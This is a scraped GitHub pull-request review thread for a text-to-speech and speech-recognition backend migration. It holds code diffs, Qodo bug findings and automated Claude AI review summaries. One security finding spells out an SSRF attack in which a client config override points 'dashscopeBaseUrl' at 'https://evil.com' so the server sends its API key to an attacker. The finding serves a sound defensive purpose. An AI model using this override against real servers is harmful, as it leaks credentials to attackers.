+    api_key = _resolve_tts_api_key(runtime_config, overrides)
+    if not api_key:
+        raise HTTPException(status_code=400, detail="Missing apiKey for TTS provider")
+
+    if engine_id in VOLCENGINE_ENGINE_IDS:
+        return await _forward_volcengine_tts(
+            runtime_config=runtime_config,
+            text=text,
+            overrides=overrides,
+            api_key=api_key,
+        )

-    if engine_type in {"dify_tts", "dify"}:
-        stream = await _stream_dify_tts(config, text, overrides)
-        return StreamingResponse(stream, media_type="audio/mpeg")
+    if engine_id in ALIBABA_ENGINE_IDS:
+        return await _forward_alibaba_tts(
+            engine_id=engine_id,
+            runtime_config=runtime_config,
+            text=text,
+            overrides=overrides,
+            api_key=api_key,
+        )

-    if engine_type in {"coze_tts", "coze"}:
-        stream = await _stream_coze_tts(config, text, overrides)
-        return StreamingResponse(stream, media_type="audio/mpeg")
+    payload = _build_unspeech_payload(
+        engine_id=engine_id,
+        runtime_config=runtime_config,
+        text=text,
+        overrides=overrides,
+    )

-    base_url_override, api_key_override = _resolve_connection_overrides(overrides)
-    payload: Dict[str, Any] = {"model": config.model, "input": text}
-    payload.update(config.default_params)
-    payload.update(sanitize_config(overrides))
+    speech_path = runtime_config.paths.get("speech") if runtime_config.paths else None
+    url = runtime_config.base_url.rstrip("/") + normalize_path(speech_path or "/audio/speech")
Evidence
The TTS execution path now only special-cases Volcengine/Alibaba; everything else is forced through
_build_unspeech_payload, which hard-requires model and voice. But dify-tts and coze-tts
engine configs do not define a model, so they cannot satisfy the new required payload fields.

backend/app/api/tts.py[76-115]
backend/app/api/tts.py[376-389]
backend/config/engines.yaml[138-179]

Agent prompt
The issue below was found during a code review. Follow the provided context and guidance below and implement a solution

## Issue description
`backend/app/api/tts.py` removed the dedicated Dify/Coze TTS execution paths, but `backend/config/engines.yaml` still defines `dify-tts` and `coze-tts` engines that don&amp;#x27;t have an OpenAI-style `model`/`voice` contract. As a result, requests to these engines will now fail with &amp;quot;Missing model&amp;quot; or send incompatible JSON to `/text-to-audio` / Coze endpoints.
## Issue Context
The PR focuses on direct backend routing for Volcengine/Alibaba. That change unintentionally (or implicitly) altered behavior for other TTS engine types.
## Fix Focus Areas
- backend/app/api/tts.py[76-115]
- backend/app/api/tts.py[376-415]
- backend/config/engines.yaml[138-179]

ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools


2. Volcengine auth header typo 🐞 Bug ✓ Correctness
Description
The Volcengine forwarder sets Authorization: Bearer;{api_key} (semicolon) instead of the standard
Bearer format used elsewhere in the backend. This is very likely to cause authentication failures
for all Volcengine TTS requests.
Code

backend/app/api/tts.py[R583-587]

+    headers = {
+        "Content-Type": "application/json",
+        "Authorization": f"Bearer;{api_key}",
+    }
+    headers.update(runtime_config.headers)
Evidence
The Volcengine forwarder uses a different Authorization header format than both the generic TTS
relay and the ASR codepaths. This inconsistency strongly indicates a typo/regression in the new
Volcengine routing logic.

backend/app/api/tts.py[583-587]
backend/app/api/tts.py[117-120]
backend/app/api/asr.py[337-342]

Agent prompt
The issue below was found during a code review. Follow the provided context and guidance below and implement a solution

## Issue description
Volcengine TTS forwarding sends `Authorization: Bearer;{api_key}` which is inconsistent with the rest of the backend (`Bearer {api_key}`) and is likely an authentication-breaking typo.
## Issue Context
This occurs only in the new direct Volcengine routing path.
## Fix Focus Areas
- backend/app/api/tts.py[574-616]

ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools



Remediation recommended

3. Volcengine health mismatch 🐞 Bug ⛯ Reliability
Description
volcengine-speech now uses the official provider base_url but still configures a /models
health path, while health checks always call base_url + health_path. This health check is no
longer aligned with the engine’s actual direct-routing behavior and may produce misleading unhealthy
results.
Code

backend/config/engines.yaml[R106-112]

   - id: volcengine-speech
     label: Volcengine
     type: openai_compat
-      base_url: https://unspeech.hyp3r.link/v1
+      base_url: https://openspeech.bytedance.com/api/v1/tts
     model: v1
     api_key_env: UNSPEECH_API_KEY
     paths:
Evidence
The health-check mechanism concatenates base_url with a (default) OpenAI-style path (/models).
After switching Volcengine to an official TTS endpoint base URL, this health strategy is no longer
obviously appropriate, especially since runtime requests bypass OpenAI-compatible semantics entirely
via the _forward_volcengine_tts path.

backend/config/engines.yaml[106-115]
backend/app/services/engines/health.py[24-27]
backend/app/api/tts.py[90-96]

Agent prompt
The issue below was found during a code review. Follow the provided context and guidance below and implement a solution

## Issue description
After switching Volcengine to a direct provider base URL, the engine health check still calls `base_url + /models` (OpenAI-compat style). This may not reflect real Volcengine availability and can create false negatives.
## Issue Context
Health checks are used by `/tts/engines/{engine}/health` and rely on `paths.health`.
## Fix Focus Areas
- backend/config/engines.yaml[106-115]
- backend/app/services/engines/health.py[10-44]

ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools


Grey Divider

ⓘ The new review experience is currently in Beta. Learn more

Grey Divider

Qodo Logo

@github-actions
Copy link

github-actions bot commented Mar 1, 2026

Blocker (can’t start the diff-scoped review)

  • gh pr view / gh pr diff fail with: error connecting to api.github.com (no outbound network/DNS in this sandbox). curl https://github.com also fails (Could not resolve host), so I can’t fetch PR feat: migrate TTS providers to backend direct routing #36 metadata/diff or post review comments/labels.

What I can confirm from the local GitHub Actions event payload

  • PR #36 (base dev, head fix/tts-voice-flow) has 8862 additions, 992 deletions, 66 files changed → Size = XL (recommended label: size/XL).

Unblock options (pick one)

  • Enable DNS + HTTPS egress to api.github.com (and rerun), so I can execute the required gh pr diff/view/edit/review workflow.
  • Or paste the outputs of:
    • gh pr diff 36 --repo datawhalechina/whale-whisper --color=never
    • gh pr view 36 --repo datawhalechina/whale-whisper --json headRefOid,additions,deletions,changedFiles,files --jq '.headRefOid, .additions, .deletions, .changedFiles, (.files[].path)'

With that diff, I’ll produce diff-line-only inline comment commands (with exact path + line + concrete code fixes) and the final gh pr review summary body, plus XL split suggestions grounded in the actual changes.

Copy link

@github-actions github-actions bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Code Review Summary

This PR migrates TTS/ASR providers from relying on the unspeech proxy to direct backend routing to Volcengine and Alibaba Cloud endpoints. The implementation is substantial (66 files, 8730+/992-) with solid test coverage for the new backend relay paths and frontend request builders. Two issues warrant attention before merge.

PR Size: XL

Issues Found

Category Critical High Medium Low
Security 1 0 0 0
Error Handling 0 1 0 0
Hygiene 0 0 1 0

Detail

  1. [SECURITY-VULNERABILITY] SSRF via user-controlled provider URLs_resolve_volcengine_tts_url and _resolve_alibaba_tts_ws_url accept arbitrary URLs from the client-supplied config dict. A caller can redirect the backend to internal services; if server-side API keys are configured via env vars, those credentials leak to the attacker-controlled endpoint. See inline comment on tts.py:459.

  2. [ERROR-SILENT] Voice catalog load errors silently cached_load_local_tts_voices_cached catches Exception and returns []. Combined with @lru_cache, a transient read/parse failure is permanently cached as empty until process restart, with zero logging. See inline comment on registry.py:204.

  3. [HYGIENE] .idea/ directory committed — 8 IDE-specific files (inspection profiles, module config, VCS mappings) are tracked. These should be added to .gitignore alongside .vscode/.

Review Coverage

  • Logic and correctness
  • Security (OWASP Top 10)
  • Error handling
  • Type safety
  • Documentation accuracy
  • Test coverage
  • Code clarity

Automated review by Claude AI

Comment on lines 76 to +115
@router.post("/engines")
async def run_tts_engine(request: EngineRunRequest) -> StreamingResponse:
engine_id = _resolve_engine_id(request.engine)
config = _get_engine_config(engine_id)
text = _coerce_text(request.data)
async def run_tts_engine(request: EngineRunRequest) -> Response:
engine_id = _resolve_tts_engine_id(request.engine)
runtime_config = _get_tts_engine_config(engine_id)

text = _extract_tts_input(request.data)
if not text:
raise HTTPException(status_code=400, detail="Missing text input")

engine_type = (config.engine_type or "openai_compat").lower()
overrides = request.config if isinstance(request.config, dict) else {}
api_key = _resolve_tts_api_key(runtime_config, overrides)
if not api_key:
raise HTTPException(status_code=400, detail="Missing apiKey for TTS provider")

if engine_id in VOLCENGINE_ENGINE_IDS:
return await _forward_volcengine_tts(
runtime_config=runtime_config,
text=text,
overrides=overrides,
api_key=api_key,
)

if engine_type in {"dify_tts", "dify"}:
stream = await _stream_dify_tts(config, text, overrides)
return StreamingResponse(stream, media_type="audio/mpeg")
if engine_id in ALIBABA_ENGINE_IDS:
return await _forward_alibaba_tts(
engine_id=engine_id,
runtime_config=runtime_config,
text=text,
overrides=overrides,
api_key=api_key,
)

if engine_type in {"coze_tts", "coze"}:
stream = await _stream_coze_tts(config, text, overrides)
return StreamingResponse(stream, media_type="audio/mpeg")
payload = _build_unspeech_payload(
engine_id=engine_id,
runtime_config=runtime_config,
text=text,
overrides=overrides,
)

base_url_override, api_key_override = _resolve_connection_overrides(overrides)
payload: Dict[str, Any] = {"model": config.model, "input": text}
payload.update(config.default_params)
payload.update(sanitize_config(overrides))
speech_path = runtime_config.paths.get("speech") if runtime_config.paths else None
url = runtime_config.base_url.rstrip("/") + normalize_path(speech_path or "/audio/speech")

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Action required

1. Dify/coze tts broken 🐞 Bug ✓ Correctness

run_tts_engine no longer routes dify_tts/coze_tts to their dedicated implementations and
instead falls through to _build_unspeech_payload, which requires model and voice. Since
dify-tts/coze-tts are still configured without a model, these engines will now error (400) or
send incompatible payloads to their provider endpoints.
Agent Prompt
## Issue description
`backend/app/api/tts.py` removed the dedicated Dify/Coze TTS execution paths, but `backend/config/engines.yaml` still defines `dify-tts` and `coze-tts` engines that don't have an OpenAI-style `model`/`voice` contract. As a result, requests to these engines will now fail with "Missing model" or send incompatible JSON to `/text-to-audio` / Coze endpoints.

## Issue Context
The PR focuses on direct backend routing for Volcengine/Alibaba. That change unintentionally (or implicitly) altered behavior for other TTS engine types.

## Fix Focus Areas
- backend/app/api/tts.py[76-115]
- backend/app/api/tts.py[376-415]
- backend/config/engines.yaml[138-179]

ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools

Comment on lines +583 to +587
headers = {
"Content-Type": "application/json",
"Authorization": f"Bearer;{api_key}",
}
headers.update(runtime_config.headers)

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Action required

2. Volcengine auth header typo 🐞 Bug ✓ Correctness

The Volcengine forwarder sets Authorization: Bearer;{api_key} (semicolon) instead of the standard
Bearer format used elsewhere in the backend. This is very likely to cause authentication failures
for all Volcengine TTS requests.
Agent Prompt
## Issue description
Volcengine TTS forwarding sends `Authorization: Bearer;{api_key}` which is inconsistent with the rest of the backend (`Bearer {api_key}`) and is likely an authentication-breaking typo.

## Issue Context
This occurs only in the new direct Volcengine routing path.

## Fix Focus Areas
- backend/app/api/tts.py[574-616]

ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools


def _resolve_aliyun_dashscope_base_url(params: Dict[str, Any], config) -> str:
explicit_base = str(
_first_present(params, "base_url", "baseUrl", "dashscope_base_url", "dashscopeBaseUrl")
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

[SECURITY-VULNERABILITY] SSRF + credential leakage via unblocked dashscope_base_url / dashscopeBaseUrl override keys.

ASR_BLOCKED_CONFIG_KEYS blocks base_url and baseUrl, but _resolve_aliyun_dashscope_base_url also reads dashscope_base_url and dashscopeBaseUrl from the merged params. These keys are not in the block list, so a client can inject an arbitrary destination URL through the config override dict.

Attack scenario:

  1. Client sends {"config": {"dashscopeBaseUrl": "https://evil.com"}} via the ASR endpoint
  2. No dashscopeApiKey provided → server falls back to resolve_api_key(config.api_key_env) (reads DASHSCOPE_API_KEY env var)
  3. Server POSTs to https://evil.com/compatible-mode/v1/chat/completions with Authorization: Bearer <real_api_key>
  4. Attacker captures the DashScope API key

Suggested fix — add the extra keys to the block set:

ASR_BLOCKED_CONFIG_KEYS = frozenset(
    {
        "api_key", "apiKey",
        "base_url", "baseUrl",
        "dashscope_base_url", "dashscopeBaseUrl",
        "dashscope_api_key", "dashscopeApiKey",
        "engine", "filename", "file_name",
        "file", "content_type", "mime_type",
    }
)

Alternatively, _resolve_aliyun_dashscope_base_url should only read from config.base_url (server-side YAML config) and never from client-provided overrides.

async with ws_connect(
ws_url,
additional_headers={
"Authorization": api_key,
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

[LOGIC-BUG] Missing Bearer prefix in Alibaba TTS WebSocket Authorization header.

The DashScope WebSocket streaming synthesis API (/api-ws/v1/inference) expects Authorization: bearer <api_key>. This code sends the raw API key without the prefix, which will cause authentication to fail at runtime.

Compare with the ASR realtime code which correctly uses the prefix:

# asr.py:753 — correct
"Authorization": f"Bearer {resolved['api_key']}",

Suggested fix:

additional_headers={
    "Authorization": f"Bearer {api_key}",
    "X-DashScope-DataInspection": "enable",
},


model = ALIYUN_ASR_REALTIME_MODEL
if not model:
raise HTTPException(status_code=400, detail="Alibaba Bailian ASR missing model")
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

[LOGIC-BUG] Dead code — unreachable model validation.

ALIYUN_ASR_REALTIME_MODEL is a non-empty constant ("qwen3-asr-flash-realtime"), so if not model: on line 516 can never be True. This check is dead code and may mask a real intent (e.g., the model should perhaps come from config or overrides rather than be hardcoded).

Suggested fix — remove the dead branch:

def _resolve_aliyun_dashscope_credentials(config, overrides):
    ...
    model = ALIYUN_ASR_REALTIME_MODEL
    return {
        "params": params,
        "api_key": api_key,
        "model": model,
        "base_url": _resolve_aliyun_dashscope_base_url(params, config),
    }

try:
await session.ws.close()
except Exception:
pass
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

[ERROR-SILENT] _close_aliyun_realtime_session swallows all exceptions without logging.

Two bare except Exception: pass blocks discard errors silently. While cleanup code often ignores errors, the project constitution requires logging — unexpected failures during teardown (e.g., hung reader task, broken pipe) become invisible when debugging production issues.

Suggested fix — add logger.debug so the errors are at least traceable:

async def _close_aliyun_realtime_session(session: AliyunRealtimeSession) -> None:
    if session.reader_task is not None:
        session.reader_task.cancel()
        try:
            await session.reader_task
        except asyncio.CancelledError:
            pass
        except Exception:
            logger.debug("Error awaiting Aliyun reader task during cleanup", exc_info=True)
    try:
        await session.ws.close()
    except Exception:
        logger.debug("Error closing Aliyun WebSocket during cleanup", exc_info=True)

Copy link

@github-actions github-actions bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Code Review Summary

This is a large, ambitious PR that migrates TTS/ASR from third-party relay services to direct API integration with Volcengine and Alibaba DashScope, adds real-time streaming ASR, incremental TTS during LLM streaming, and microphone UI controls. The code is generally well-structured with good error handling patterns and comprehensive test coverage for utility functions. However, there is a critical SSRF vulnerability that must be fixed before merge.

PR Size: XL

(8862 additions, 992 deletions, 66 files)

Issues Found

Category Critical High Medium Low
Security 1
Logic 1 1
Error Handling 1

Critical

  1. [SECURITY-VULNERABILITY] backend/app/api/asr.py:492 — SSRF + credential leakage via unblocked dashscope_base_url/dashscopeBaseUrl override keys. Client-provided config overrides can redirect server-side HTTP/WebSocket requests to arbitrary URLs, leaking the server's DashScope API key. The ASR_BLOCKED_CONFIG_KEYS block list must be extended to cover these alias keys.

High

  1. [LOGIC-BUG] backend/app/api/tts.py:709 — Missing Bearer prefix in Alibaba TTS WebSocket Authorization header. The DashScope streaming synthesis API expects Authorization: bearer <key>, but the code sends the raw key. The ASR code at asr.py:753 correctly uses f"Bearer {api_key}". This will cause Alibaba CosyVoice TTS to fail with an auth error in production.

Medium

  1. [LOGIC-BUG] backend/app/api/asr.py:515-517 — Dead code: model = ALIYUN_ASR_REALTIME_MODEL followed by if not model: is unreachable since the constant is a non-empty string. May mask intent to make the model configurable.

  2. [ERROR-SILENT] backend/app/api/asr.py:832-838_close_aliyun_realtime_session has two except Exception: pass blocks that silently discard errors during cleanup. Should at least use logger.debug for production traceability.

Additional Note

The .idea/ directory (JetBrains IDE config) is included in the diff. As noted in the PR checklist, this should be removed from the commit and added to .gitignore.

Review Coverage

  • Logic and correctness
  • Security (OWASP Top 10)
  • Error handling
  • Type safety
  • Documentation accuracy
  • Test coverage
  • Code clarity

Automated review by Claude AI

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

area/backend Touches backend (FastAPI/Python) area/frontend Touches frontend (Vue/TS) needs-review Needs careful review (large/complex changes) size/XL PR size: >= 1000 lines changed type/feature New feature

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant